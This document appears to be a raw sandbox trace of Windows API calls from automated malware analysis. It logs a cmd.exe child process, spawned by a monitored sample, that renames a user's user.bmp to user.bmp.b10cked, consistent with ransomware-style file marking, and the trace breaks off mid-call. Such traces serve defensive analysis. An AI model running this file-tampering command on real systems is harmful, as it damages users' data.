lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", fInfoLevelId=0x1, lpFindFileData=0x3c1ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1ac8) returned 0x3c2198 [0194.428] FindNextFileW (in: hFindFile=0x3c2198, lpFindFileData=0x3c1ac8 | out: lpFindFileData=0x3c1ac8) returned 0 [0194.428] FindClose (in: hFindFile=0x3c2198 | out: hFindFile=0x3c2198) returned 1 [0194.428] GetLastError () returned 0x12 [0194.428] _get_osfhandle (_FileHandle=2) returned 0xb [0194.429] GetFileType (hFile=0xb) returned 0x2 [0194.545] GetStdHandle 
(nStdHandle=0xfffffff4) returned 0xb [0194.545] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1eedc4 | out: lpMode=0x1eedc4) returned 1 [0194.545] _get_osfhandle (_FileHandle=2) returned 0xb [0194.545] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1eedf8 | out: lpConsoleScreenBufferInfo=0x1eedf8) returned 1 [0194.546] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0194.546] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eee38 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0194.547] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1eee1c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eee1c*=0x2c) returned 1 [0194.547] longjmp () [0194.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.547] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0194.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.547] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0194.547] _get_osfhandle (_FileHandle=0) returned 0x3 [0194.547] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0194.547] SetConsoleInputExeNameW () returned 0x1 [0194.547] GetConsoleOutputCP () returned 0x1b5 [0194.547] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0194.547] SetThreadUILanguage (LangId=0x0) returned 0x409 [0194.548] exit (_Code=1) Process: id = "442" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xd40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = 
"child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28513 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28514 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28515 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28516 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 28517 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28518 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28519 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28520 
start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28521 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 28522 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28553 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28554 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28555 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28556 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 28557 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 28558 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28559 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28560 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28561 start_va = 0x76910000 
end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28562 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28563 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28564 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28565 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28566 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28567 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 28568 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28569 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28570 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" 
filename = "" Region: id = 28571 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 28572 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 28573 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 28574 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 28575 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 28576 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 633 os_tid = 0xa64 [0193.806] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fefc | out: lpSystemTimeAsFileTime=0x22fefc*(dwLowDateTime=0xa863a3e0, dwHighDateTime=0x1d440a9)) [0193.806] GetCurrentProcessId () returned 0xd40 [0193.806] GetCurrentThreadId () returned 0xa64 [0193.806] GetTickCount () returned 0x370cb [0193.806] QueryPerformanceCounter (in: lpPerformanceCount=0x22fef4 | out: lpPerformanceCount=0x22fef4*=25059568732) returned 1 [0193.807] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0193.807] __set_app_type (_Type=0x1) [0193.807] __p__fmode () returned 0x76b331f4 [0193.807] __p__commode () returned 0x76b331fc [0193.807] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0193.807] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0193.807] GetCurrentThreadId () returned 0xa64 [0193.807] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, 
dwThreadId=0xa64) returned 0x38 [0193.808] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0193.808] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0193.808] SetThreadUILanguage (LangId=0x0) returned 0x409 [0193.808] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0193.808] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fe8c | out: phkResult=0x22fe8c*=0x0) returned 0x2 [0193.808] VirtualQuery (in: lpAddress=0x22fec3, lpBuffer=0x22fe5c, dwLength=0x1c | out: lpBuffer=0x22fe5c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0193.808] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fe5c, dwLength=0x1c | out: lpBuffer=0x22fe5c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0193.808] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fe5c, dwLength=0x1c | out: lpBuffer=0x22fe5c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0193.808] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fe5c, dwLength=0x1c | out: lpBuffer=0x22fe5c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0193.808] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fe5c, dwLength=0x1c | out: lpBuffer=0x22fe5c*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0193.808] GetConsoleOutputCP () returned 0x1b5 [0193.808] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: 
lpCPInfo=0x4a9e4260) returned 1 [0193.808] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0193.808] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.808] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0193.808] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.809] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0193.809] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.809] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0193.809] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.809] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0193.809] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.809] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0193.809] GetEnvironmentStringsW () returned 0x3e0180* [0193.809] FreeEnvironmentStringsW (penv=0x3e0180) returned 1 [0193.809] GetEnvironmentStringsW () returned 0x3e0180* [0193.810] FreeEnvironmentStringsW (penv=0x3e0180) returned 1 [0193.810] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22edfc | out: phkResult=0x22edfc*=0x40) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x0, lpData=0x22ee08*=0xa8, lpcbData=0x22ee00*=0x1000) returned 0x2 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x1, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x0, lpData=0x22ee08*=0x1, lpcbData=0x22ee00*=0x1000) returned 0x2 [0193.810] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x0, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x40, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x40, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x0, lpData=0x22ee08*=0x40, lpcbData=0x22ee00*=0x1000) returned 0x2 [0193.810] RegCloseKey (hKey=0x40) returned 0x0 [0193.810] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22edfc | out: phkResult=0x22edfc*=0x40) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x0, lpData=0x22ee08*=0x40, lpcbData=0x22ee00*=0x1000) returned 0x2 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x1, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x0, lpData=0x22ee08*=0x1, lpcbData=0x22ee00*=0x1000) returned 0x2 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, 
lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x0, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x9, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x9, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x0, lpData=0x22ee08*=0x9, lpcbData=0x22ee00*=0x1000) returned 0x2 [0193.810] RegCloseKey (hKey=0x40) returned 0x0 [0193.810] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639b [0193.810] srand (_Seed=0x5b88639b) [0193.810] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked\"" [0193.811] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked\"" [0193.811] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.811] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0193.811] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0193.811] 
GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0193.811] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0193.811] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0193.811] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0193.811] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0193.812] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0193.812] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0193.812] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0193.812] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0193.812] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0193.812] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0193.812] GetEnvironmentStringsW () returned 0x3e22d0* [0193.812] FreeEnvironmentStringsW (penv=0x3e22d0) returned 1 [0193.812] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.812] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0193.812] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0193.812] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0193.812] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0193.812] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0193.812] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0193.812] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0193.812] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0193.812] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0193.812] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x22fbc8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.812] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22fbc8, lpFilePart=0x22fbc4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22fbc4*="Desktop") returned 0x18 [0193.812] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0193.813] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f944 | out: lpFindFileData=0x22f944) returned 0x3e0010 [0193.813] FindClose (in: hFindFile=0x3e0010 | out: hFindFile=0x3e0010) returned 1 [0193.813] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f944 | out: lpFindFileData=0x22f944) returned 0x3e0010 [0193.813] FindClose (in: hFindFile=0x3e0010 | out: hFindFile=0x3e0010) returned 1 [0193.813] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f944 | out: lpFindFileData=0x22f944) returned 0x3e0010 [0193.813] FindClose (in: hFindFile=0x3e0010 | out: hFindFile=0x3e0010) returned 1 [0193.813] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0193.813] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0193.813] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0193.814] GetEnvironmentStringsW () returned 0x3e2af0* [0193.814] FreeEnvironmentStringsW (penv=0x3e2af0) returned 1 [0193.814] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.814] GetConsoleOutputCP () returned 0x1b5 [0193.815] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0193.815] GetUserDefaultLCID () returned 0x409 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, 
cchData=8 | out: lpLCData=":") returned 2 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fd08, cchData=128 | out: lpLCData="0") returned 2 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fd08, cchData=128 | out: lpLCData="0") returned 2 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fd08, cchData=128 | out: lpLCData="1") returned 2 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0193.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0193.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0193.816] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0193.816] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0193.816] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0193.817] GetConsoleTitleW (in: lpConsoleTitle=0x3d08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.817] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0193.817] GetProcAddress (hModule=0x76910000, 
lpProcName="CopyFileExW") returned 0x7694ac6c [0193.817] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0193.817] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0193.818] _wcsicmp (_String1="move", _String2=")") returned 68 [0193.818] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0193.818] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0193.818] _wcsicmp (_String1="IF", _String2="move") returned -4 [0193.818] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0193.818] _wcsicmp (_String1="REM", _String2="move") returned 5 [0193.818] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0193.820] GetConsoleTitleW (in: lpConsoleTitle=0x22fa00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.821] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0193.821] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0193.821] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0193.821] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0193.821] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0193.821] _wcsicmp (_String1="move", _String2="CD") returned 10 [0193.821] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0193.821] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0193.821] _wcsicmp (_String1="move", _String2="REN") returned -5 [0193.821] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0193.821] _wcsicmp (_String1="move", _String2="SET") returned -6 [0193.821] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0193.821] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0193.821] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0193.821] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0193.821] _wcsicmp (_String1="move", _String2="MD") returned 11 [0193.821] _wcsicmp (_String1="move", _String2="MKDIR") 